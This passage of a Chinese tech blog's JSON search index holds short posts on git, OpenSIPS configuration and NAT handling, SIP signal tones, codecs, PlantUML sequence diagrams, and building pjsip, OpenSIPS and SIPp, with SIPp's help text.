https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","permalink":"https://wdd.js.org/posts/2019/09/vccx09/","summary":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件和目录 参考 https://stackoverflow.com/questions/61212/how-to-remove-local-untracked-files-from-the-current-git-working-tree ","title":"git 删除未跟踪的文件"},{"content":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = 
\u0026#34;INVITE\u0026#34;; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","permalink":"https://wdd.js.org/opensips/ch3/elk/","summary":"构造json $json(body) := \u0026#34;{}\u0026#34;; $json(body/time) = $time(%F %T-0300); $json(body/sipRequest) = \u0026#34;INVITE\u0026#34;; $json(body/ipIntruder) = $si; $json(body/destNum) = $rU; $json(body/userAgent) = $ua; $json(body/country)=$var(city); $json(body/location)=$var(latlon); $json(body/ipHost) = $Ri; 使用async rest_post写数据 async好像存在于2.1版本及其以上, 异步的好处是不会阻止脚本的继续执行 async(rest_post(\u0026#34;http://user:password@w.x.y.z:9200/opensips/1\u0026#34;, \u0026#34;$json(body)\u0026#34;, \u0026#34;$var(ctype)\u0026#34;, \u0026#34;$var(ct)\u0026#34;, \u0026#34;$var(rcode)\u0026#34;),resume) ","title":"opensips日志写入elasticsearch"},{"content":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","permalink":"https://wdd.js.org/posts/2019/09/wn0a02/","summary":" https://smallpdf.com https://www.pdfpai.com/pdf-to-powerpoint ","title":"pdf转ppt工具收集"},{"content":"特点分析 回铃音有以下特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 常见问题 听不到回铃音 
【现象】打同一个号码,有些手机能听到回铃音,有些手机听不到回铃音【排查思路】\n有些手机volte开启后,可能会导致无回铃音,所以可以关闭volte试试 被叫的运营商,主叫手机的运营商 参考资料 https://zh.wikipedia.org/wiki/%E5%9B%9E%E9%93%83%E9%9F%B3 https://baike.baidu.com/item/%E5%9B%9E%E9%93%83%E9%9F%B3/1014322 http://www.it9000.cn/tech/CTI/signal.html ","title":"回铃音"},{"content":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","permalink":"https://wdd.js.org/opensips/ch2/early-media-type/","summary":"几种常用电话信号音的含义 信号频率:(450±25)HZ:拨号音、回铃音、忙音、长途通知音、空号音(950±25)HZ:催挂音\n拨号音 摘机后受话器中便有一种“嗡\u0026ndash;”的连续音,这种声音就是拨号音,它表示自动交换机或对方呼叫中心系统已经做好了接续准备,允许用户拨号\n回铃音 拨完被叫号,若听到“嘟\u0026ndash;嘟\u0026ndash;”的断续音(响1s,断4s),便是回铃音,表示被叫话机正在响铃,可静候接话;如果振铃超过10余次,仍无人讲话,说明对方无人接电话,应放好手柄稍后再拨。\n忙音 当主叫用户在拨号过程中或拨完被叫电话号码后,若听到“嘟、嘟、嘟……”的短促音(响0.35s,断0.35s),这就是忙音,表示线路已经被占满或被叫电话机正在使用\n长途通知音 当主叫用户和被叫用户正在进行市内通话时,听到“嘟、嘟、嘟……”的短促音(响0.2s,断0.2s,响0.2s,间歇0.6s),这便是长途电话通知音,表示有长途电话插入,提醒主被叫用户双方尽快结束市内通话,准备接听长途电话。\n空号音 当用户拨完号码后听到不等间隔断续信号音(重复3次0.1s响,0.1s断后,0.4s响0.4s断),这便是空号音,表示通知主叫用户所呼叫的被叫号码为空号或受限制的号码。\n催挂音 如果用户听到连续信号音,响度变化为5级,由低级逐步升高,则是催挂音。通知久不挂机的用户迅速挂机。\n参考 http://www.it9000.cn/tech/CTI/signal.html ","title":"几种常用电话信号音的含义"},{"content":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on branch master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 
","permalink":"https://wdd.js.org/posts/2019/09/msx8i9/","summary":"问题描述 连接服务器时的报警\n-bash: 警告:setlocale: LC_CTYPE: 无法改变区域选项 (UTF-8): 没有那个文件或目录 git status 发现本来应该显示 \u0026lsquo;on branch master\u0026rsquo; 之类的地方,居然英文也乱码了,都是问号。\n解决方案 vim /etc/environment , 然后加入如下代码,然后重新打开ssh窗口\nLC_ALL=en_US.UTF-8 LANG=en_US.UTF-8 ","title":"Royal TSX git status 输出乱码"},{"content":"git config --global --unset http.proxy ","permalink":"https://wdd.js.org/posts/2019/09/yko32n/","summary":"git config --global --unset http.proxy ","title":"git取消设置http代理"},{"content":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和receive参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真实出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头是用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/fix-nat/","summary":"解决信令的过程 NAT检测 使用rport解决Via 在初始化请求和响应中修改Contact头 处理来自NAT内部的注册请求 Ping客户端使NAT映射保持打开 处理序列化请求 实现NAT检测 nat_uac_test 使用函数 nat_uac_test\n1 搜索Contact头存在于RFC 1918 中的地址 2 检测Via头中的received参数和源地址是否相同 4 最顶部的Via出现在RFC1918 / 
RFC6598地址中 8 搜索SDP头出现RFC1918 / RFC6598地址 16 测试源端口是否和Via头中的端口不同 32 比较Contact中的地址和源信令的地址 64 比较Contact中的端口和源信令的端口 上边的测试都是可以组合的,并且任何一个测试通过,则返回true。\n例如下面的测试19,实际上是1+2+16三项测试的组合\nnat_uac_test(\u0026#34;19\u0026#34;) 使用rport和receive参数标记Via头 从NAT内部出去的呼叫,往往可能不知道自己的出口IP和端口,只有远端的SIP服务器收到请求后,才能知道UAC的真实出口IP和端口。出口IP用received=x.x.x.x,出口端口用rport=xx。当有消息发到UAC时,应当发到received和rport所指定的地址和端口。\n# 原始的Via Via: SIP/2.0/UDP 192.168.4.48:5062;branch=z9hG4bK523223793;rport # 经过opensips处理后的Via Via: SIP/2.0/UDP 192.168.4.48:5062;received=192.168.4.48;branch=z9hG4bK523223793;rport=5062 修复Contact头 Via头和Contact头是比较容易混淆的概念,但是两者的功能完全不同。Via头是用来导航183和200响应应该如何按照原路返回。Contact用来给序列化请求,例如BYE和UPDATE导航。如果Contact头不正确,可能会导致呼叫无法挂断。那么就需要用fix_nated_contact()函数去修复Contact头。另外,对于183和200的响应也需要去修复Contact头。\n处理注册请求 RFC 1918 地址组 10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) 参考 http://www.rfcreader.com/#rfc1918 ","title":"NAT解决方法"},{"content":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是有专利的,也就是说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBC 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视频 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样频率是8000Hz, 那么每个包会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个字节的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","permalink":"https://wdd.js.org/opensips/ch4/media-codec/","summary":" 编码 带宽 MOS 环境 特点 说明 G.711 64 kbps 4.45 LAN/WAN 语音质量高,适合对接网关 G.711实际上就是PCM, 是最基本的编码方式。PCM又分为两类PCMA(g711a), PCMU(g711u)。中国使用的是PCMA G.729 8 kbps 4.04 WAN 带宽占用率很小,同时能保证不错的语音质量 分为G729a和G729b两种,G729之所以带宽占用是G711的1/8, 
是因为G729的压缩算法不同。G729传输的不是真正的语音,而是语音压缩后的结果。G729的编解码是有专利的,也就是说不免费。 G.722 64 kbps 4.5 LAN 语音质量高 HD hd语音 GSM 13.3 kbps 3.01 iLBC 13.3 15.2 抗丢包 OPUS 6-510 kbps - INTERNET OPUS的带宽范围跨度很广,适合语音和视频 MOS值,Mean Opinion Score,用来定义语音质量。满分为5分,最低1分。\nMOS 质量 5 极好的 4 不错的 3 还行吧 2 中等差 1 最差 通常的打包是20ms一个包,那么一秒就会传输1000/20=50个包。如果采样频率是8000Hz, 那么每个包会携带 8000/50=160个采样数据。在PCMA或者PCMU中,每个采样数据占用1字节。因此20ms的一个包就携带160字节的数据。\n在RTP包协议中,160字节还要加上12个字节的RTP头。 在fs上可以使用下面的命令查看fs支持的编码。\nshow codec ","title":"常见媒体流编码及其特点"},{"content":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","permalink":"https://wdd.js.org/opensips/tools/pjsip/","summary":"环境说明 centos7.6 docker 容器 过程 wget https://www.pjsip.org/release/2.9/pjproject-2.9.zip unzip pjproject-2.9.zip cd pjproject-2.9 chmod +x configure aconfigure yum install gcc gcc-c++ make -y make dep make make install yum install centos-release-scl yum install rh-python36 参考 https://www.pjsip.org/download.htm https://trac.pjsip.org/repos/wiki/Getting-Started https://trac.pjsip.org/repos/wiki/Getting-Started/Autoconf https://linuxize.com/post/how-to-install-python-3-on-centos-7/ ","title":"pjsip"},{"content":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时间后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要在深究的路径上走得太深 在走其他路径时,也不要忘记最后要回到A点 
","permalink":"https://wdd.js.org/posts/2019/09/xi7kpf/","summary":"前端组件化时,有个很时髦的词语叫做关注点分离,这个用在组件上比较好,我们可以把大的模块分割成小的模块,降低了整个模块的复杂度。\n但是有时候,我觉得关注点分离并不好。这个不是指在代码开发过程,而是解决问题的过程。\n关注点分离的处理方式 假如我要解决问题A,但是在解决过程中,我发现了一个我不知道的东西B, 然后我就去研究这B是什么东西,然后接二连三,我从B一路找到了Z。\n然后在这个解决过程耽误一段时间后,才想起来:我之前是要解决什么问题来着??\n关注点集中的处理方式 不要在深究的路径上走得太深 在走其他路径时,也不要忘记最后要回到A点 ","title":"关注点分离的问题"},{"content":"web服务器如果是基于tcp的,那么用来监听的端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,既可以用来做listen的端口,也可以从这个端口主动发消息出去。\n","permalink":"https://wdd.js.org/posts/2019/09/vc8oxs/","summary":"web服务器如果是基于tcp的,那么用来监听的端口例如80,一定只能用来接收消息,而不能从这个端口主动发消息出去。\n但是udp服务器就不一样了,同一端口,既可以用来做listen的端口,也可以从这个端口主动发消息出去。","title":"TCP和UDP的区别畅想"},{"content":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber\n@startuml autonumber alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 
","permalink":"https://wdd.js.org/posts/2019/09/hvscve/","summary":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber","title":"PlantUML教程 包学包会"},{"content":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 
# 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/centos-install/","summary":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","title":"centos7 安装opensips"},{"content":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装依赖 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. 
附件 sipp-3.3.990.tar.gz\n使用默认场景 uas sipp -sn uas -i 192.168.2.101 -sn 表示使用默认场景文件 uas 作为sip服务器 uac 作为sip客户端 -i 设置本地ip给Contact头 demo场景 sipp模拟sip服务器,当收到invite之后,先返回100,然后返回183,然后返回500\n首先我们将sipp内置的uas场景文件拿出来,基于这个场景文件做修改\n生成配置文件 sipp -sd uas \u0026gt; uas.xml 编辑配置文件\n启动uas\nsipp -sf uas.xml -i 192.168.40.77 -p 18627 -bg -skip_rlimit 帮助文档 Usage: sipp remote_host[:remote_port] [options] Available options: -v : Display version and copyright information. -aa : Enable automatic 200 OK answer for INFO, UPDATE and NOTIFY messages. -auth_uri : Force the value of the URI for authentication. By default, the URI is composed of remote_ip:remote_port. -au : Set authorization username for authentication challenges. Default is taken from -s argument -ap : Set the password for authentication challenges. Default is \u0026#39;password\u0026#39; -base_cseq : Start value of [cseq] for each call. -bg : Launch SIPp in background mode. -bind_local : Bind socket to local IP address, i.e. the local IP address is used as the source IP address. If SIPp runs in server mode it will only listen on the local IP address instead of all IP addresses. -buff_size : Set the send and receive buffer size. -calldebug_file : Set the name of the call debug file. -calldebug_overwrite: Overwrite the call debug file (default true). -cid_str : Call ID string (default %u-%p@%s). %u=call_number, %s=ip_address, %p=process_number, %%=% (in any order). -ci : Set the local control IP address -cp : Set the local control port number. Default is 8888. -d : Controls the length of calls. More precisely, this controls the duration of \u0026#39;pause\u0026#39; instructions in the scenario, if they do not have a \u0026#39;milliseconds\u0026#39; section. Default value is 0 and default unit is milliseconds. -deadcall_wait : How long the Call-ID and final status of calls should be kept to improve message and error logs (default unit is ms). -default_behaviors: Set the default behaviors that SIPp will use. 
Possbile values are: - all\tUse all default behaviors - none\tUse no default behaviors - bye\tSend byes for aborted calls - abortunexp\tAbort calls on unexpected messages - pingreply\tReply to ping requests If a behavior is prefaced with a -, then it is turned off. Example: all,-bye -error_file : Set the name of the error log file. -error_overwrite : Overwrite the error log file (default true). -f : Set the statistics report frequency on screen. Default is 1 and default unit is seconds. -fd : Set the statistics dump log report frequency. Default is 60 and default unit is seconds. -i : Set the local IP address for \u0026#39;Contact:\u0026#39;,\u0026#39;Via:\u0026#39;, and \u0026#39;From:\u0026#39; headers. Default is primary host IP address. -inf : Inject values from an external CSV file during calls into the scenarios. First line of this file say whether the data is to be read in sequence (SEQUENTIAL), random (RANDOM), or user (USER) order. Each line corresponds to one call and has one or more \u0026#39;;\u0026#39; delimited data fields. Those fields can be referred as [field0], [field1], ... in the xml scenario file. Several CSV files can be used simultaneously (syntax: -inf f1.csv -inf f2.csv ...) -infindex : file field Create an index of file using field. For example -inf users.csv -infindex users.csv 0 creates an index on the first key. -ip_field : Set which field from the injection file contains the IP address from which the client will send its messages. If this option is omitted and the \u0026#39;-t ui\u0026#39; option is present, then field 0 is assumed. Use this option together with \u0026#39;-t ui\u0026#39; -l : Set the maximum number of simultaneous calls. Once this limit is reached, traffic is decreased until the number of open calls goes down. Default: (3 * call_duration (s) * rate). -log_file : Set the name of the log actions log file. -log_overwrite : Overwrite the log actions log file (default true). 
-lost : Set the number of packets to lose by default (scenario specifications override this value). -rtcheck : Select the retransmisison detection method: full (default) or loose. -m : Stop the test and exit when \u0026#39;calls\u0026#39; calls are processed -mi : Set the local media IP address (default: local primary host IP address) -master : 3pcc extended mode: indicates the master number -max_recv_loops : Set the maximum number of messages received read per cycle. Increase this value for high traffic level. The default value is 1000. -max_sched_loops : Set the maximum number of calsl run per event loop. Increase this value for high traffic level. The default value is 1000. -max_reconnect : Set the the maximum number of reconnection. -max_retrans : Maximum number of UDP retransmissions before call ends on timeout. Default is 5 for INVITE transactions and 7 for others. -max_invite_retrans: Maximum number of UDP retransmissions for invite transactions before call ends on timeout. -max_non_invite_retrans: Maximum number of UDP retransmissions for non-invite transactions before call ends on timeout. -max_log_size : What is the limit for error and message log file sizes. -max_socket : Set the max number of sockets to open simultaneously. This option is significant if you use one socket per call. Once this limit is reached, traffic is distributed over the sockets already opened. Default value is 50000 -mb : Set the RTP echo buffer size (default: 2048). -message_file : Set the name of the message log file. -message_overwrite: Overwrite the message log file (default true). -mp : Set the local RTP echo port number. Default is 6000. -nd : No Default. 
Disable all default behavior of SIPp which are the following: - On UDP retransmission timeout, abort the call by sending a BYE or a CANCEL - On receive timeout with no ontimeout attribute, abort the call by sending a BYE or a CANCEL - On unexpected BYE send a 200 OK and close the call - On unexpected CANCEL send a 200 OK and close the call - On unexpected PING send a 200 OK and continue the call - On any other unexpected message, abort the call by sending a BYE or a CANCEL -nr : Disable retransmission in UDP mode. -nostdin : Disable stdin. -p : Set the local port number. Default is a random free port chosen by the system. -pause_msg_ign : Ignore the messages received during a pause defined in the scenario -periodic_rtd : Reset response time partition counters each logging interval. -plugin : Load a plugin. -r : Set the call rate (in calls per seconds). This value can bechanged during test by pressing \u0026#39;+\u0026#39;,\u0026#39;_\u0026#39;,\u0026#39;*\u0026#39; or \u0026#39;/\u0026#39;. Default is 10. pressing \u0026#39;+\u0026#39; key to increase call rate by 1 * rate_scale, pressing \u0026#39;-\u0026#39; key to decrease call rate by 1 * rate_scale, pressing \u0026#39;*\u0026#39; key to increase call rate by 10 * rate_scale, pressing \u0026#39;/\u0026#39; key to decrease call rate by 10 * rate_scale. If the -rp option is used, the call rate is calculated with the period in ms given by the user. -rp : Specify the rate period for the call rate. Default is 1 second and default unit is milliseconds. This allows you to have n calls every m milliseconds (by using -r n -rp m). Example: -r 7 -rp 2000 ==\u0026gt; 7 calls every 2 seconds. -r 10 -rp 5s =\u0026gt; 10 calls every 5 seconds. -rate_scale : Control the units for the \u0026#39;+\u0026#39;, \u0026#39;-\u0026#39;, \u0026#39;*\u0026#39;, and \u0026#39;/\u0026#39; keys. -rate_increase : Specify the rate increase every -fd units (default is seconds). 
This allows you to increase the load for each independent logging period. Example: -rate_increase 10 -fd 10s ==\u0026gt; increase calls by 10 every 10 seconds. -rate_max : If -rate_increase is set, then quit after the rate reaches this value. Example: -rate_increase 10 -rate_max 100 ==\u0026gt; increase calls by 10 until 100 cps is hit. -no_rate_quit : If -rate_increase is set, do not quit after the rate reaches -rate_max. -recv_timeout : Global receive timeout. Default unit is milliseconds. If the expected message is not received, the call times out and is aborted. -send_timeout : Global send timeout. Default unit is milliseconds. If a message is not sent (due to congestion), the call times out and is aborted. -sleep : How long to sleep for at startup. Default unit is seconds. -reconnect_close : Should calls be closed on reconnect? -reconnect_sleep : How long (in milliseconds) to sleep between the close and reconnect? -ringbuffer_files: How many error/message files should be kept after rotation? -ringbuffer_size : How large should error/message files be before they get rotated? -rsa : Set the remote sending address to host:port for sending the messages. -rtp_echo : Enable RTP echo. RTP/UDP packets received on port defined by -mp are echoed to their sender. RTP/UDP packets coming on this port + 2 are also echoed to their sender (used for sound and video echo). -rtt_freq : freq is mandatory. Dump response times every freq calls in the log file defined by -trace_rtt. Default value is 200. -s : Set the username part of the resquest URI. Default is \u0026#39;service\u0026#39;. -sd : Dumps a default scenario (embeded in the sipp executable) -sf : Loads an alternate xml scenario file. To learn more about XML scenario syntax, use the -sd option to dump embedded scenarios. They contain all the necessary help. -shortmessage_file: Set the name of the short message log file. -shortmessage_overwrite: Overwrite the short message log file (default true). 
-oocsf : Load out-of-call scenario. -oocsn : Load out-of-call scenario. -skip_rlimit : Do not perform rlimit tuning of file descriptor limits. Default: false. -slave : 3pcc extended mode: indicates the slave number -slave_cfg : 3pcc extended mode: indicates the file where the master and slave addresses are stored -sn : Use a default scenario (embedded in the sipp executable). If this option is omitted, the Standard SipStone UAC scenario is loaded. Available values in this version: - \u0026#39;uac\u0026#39; : Standard SipStone UAC (default). - \u0026#39;uas\u0026#39; : Simple UAS responder. - \u0026#39;regexp\u0026#39; : Standard SipStone UAC - with regexp and variables. - \u0026#39;branchc\u0026#39; : Branching and conditional branching in scenarios - client. - \u0026#39;branchs\u0026#39; : Branching and conditional branching in scenarios - server. Default 3pcc scenarios (see -3pcc option): - \u0026#39;3pcc-C-A\u0026#39; : Controller A side (must be started after all other 3pcc scenarios) - \u0026#39;3pcc-C-B\u0026#39; : Controller B side. - \u0026#39;3pcc-A\u0026#39; : A side. - \u0026#39;3pcc-B\u0026#39; : B side. -stat_delimiter : Set the delimiter for the statistics file -stf : Set the file name to use to dump statistics -t : Set the transport mode: - u1: UDP with one socket (default), - un: UDP with one socket per call, - ui: UDP with one socket per IP address The IP addresses must be defined in the injection file. - t1: 